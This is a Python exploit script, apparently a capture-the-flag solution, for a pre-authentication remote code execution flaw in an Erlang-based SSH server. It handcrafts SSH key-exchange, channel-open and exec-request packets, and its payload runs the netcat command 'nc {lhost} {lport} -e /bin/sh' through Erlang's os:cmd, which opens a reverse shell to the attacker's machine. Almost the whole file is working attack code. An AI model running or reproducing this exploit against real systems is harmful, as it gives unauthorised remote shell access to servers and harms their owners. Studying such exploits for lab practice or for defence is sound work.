README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import socket
import struct
import time
import sys
def parse_args():
parser = argparse.ArgumentParser(
description="CTF exploit: send a pre-auth SSH channel request "
"with an Erlang RCE payload to get a reverse shell"
)
parser.add_argument(
"-lh", "--lhost",
required=True,
help="Local host/IP to receive the reverse shell"
)
parser.add_argument(
"-lp", "--lport",
type=int,
required=True,
help="Local port to receive the reverse shell"
)
parser.add_argument(
"-rh", "--rhost",
default="10.10.248.101",
help="Target SSH server IP (default: 10.10.248.101)"
)
parser.add_argument(
"-rp", "--rport",
type=int,
default=22,
help="Target SSH server port (default: 22)"
)
return parser.parse_args()
def string_payload(s: str) -> bytes:
b = s.encode("utf-8")
return struct.pack(">I", len(b)) + b
def build_channel_open(channel_id: int = 0) -> bytes:
return (
b"\x5a" # SSH_MSG_CHANNEL_OPEN
+ string_payload("session")
+ struct.pack(">I", channel_id)
+ struct.pack(">I", 0x68000) # initial window size
+ struct.pack(">I", 0x10000) # max packet size
)
def build_channel_request(channel_id: int, lhost: str, lport: int) -> bytes:
# Erlang RCE payload using netcat; trailing period is required
payload = f'os:cmd("nc {lhost} {lport} -e /bin/sh").'
return (
b"\x62" # SSH_MSG_CHANNEL_REQUEST
+ struct.pack(">I", channel_id)
+ string_payload("exec")
+ b"\x01" # want_reply = True
+ string_payload(payload)
)
def build_kexinit() -> bytes:
cookie = b"\x00" * 16
def nl(lst): return string_payload(",".join(lst))
return (
b"\x14" # SSH_MSG_KEXINIT
+ cookie
+ nl([
"curve25519-sha256", "ecdh-sha2-nistp256",
"diffie-hellman-group-exchange-sha256",
"diffie-hellman-group14-sha256",
])
+ nl(["rsa-sha2-256", "rsa-sha2-512"])
+ nl(["aes128-ctr"]) * 2
+ nl(["hmac-sha1"]) * 2
+ nl(["none"]) * 2
+ nl([]) * 2
+ b"\x00" # first_kex_packet_follows
+ struct.pack(">I", 0) # reserved
)
def pad_packet(pkt: bytes, block_size: int = 8) -> bytes:
min_pad = 4
pad_len = block_size - ((len(pkt) + 5) % block_size)
if pad_len < min_pad:
pad_len += block_size
total_len = len(pkt) + 1 + pad_len
return struct.pack(">I", total_len) + bytes([pad_len]) + pkt + b"\x00" * pad_len
def main():
args = parse_args()
print(f"[*] Target: {args.rhost}:{args.rport}")
print(f"[*] Listener: {args.lhost}:{args.lport}")
try:
with socket.create_connection((args.rhost, args.rport), timeout=5) as s:
print("[*] Connected. Exchanging banner...")
s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
banner = s.recv(1024)
print(f"[+] Banner: {banner.strip().decode(errors='ignore')}")
time.sleep(0.3)
print("[*] Sending fake KEXINIT...")
s.sendall(pad_packet(build_kexinit()))
time.sleep(0.3)
print("[*] Opening channel...")
s.sendall(pad_packet(build_channel_open()))
time.sleep(0.3)
print("[*] Sending exec request with Erlang reverse-shell payload...")
req = build_channel_request(0, args.lhost, args.lport)
s.sendall(pad_packet(req))
print("[✓] Payload sent. If the server is vulnerable, check your listener now.")
# Optionally read any immediate response
try:
resp = s.recv(1024, socket.MSG_DONTWAIT)
if resp:
print(f"[+] Response: {resp.hex()}")
except (BlockingIOError, AttributeError):
pass
except Exception as e:
print(f"[!] Exploit failed: {e}")
sys.exit(1)
if __name__ == "__main__":
main()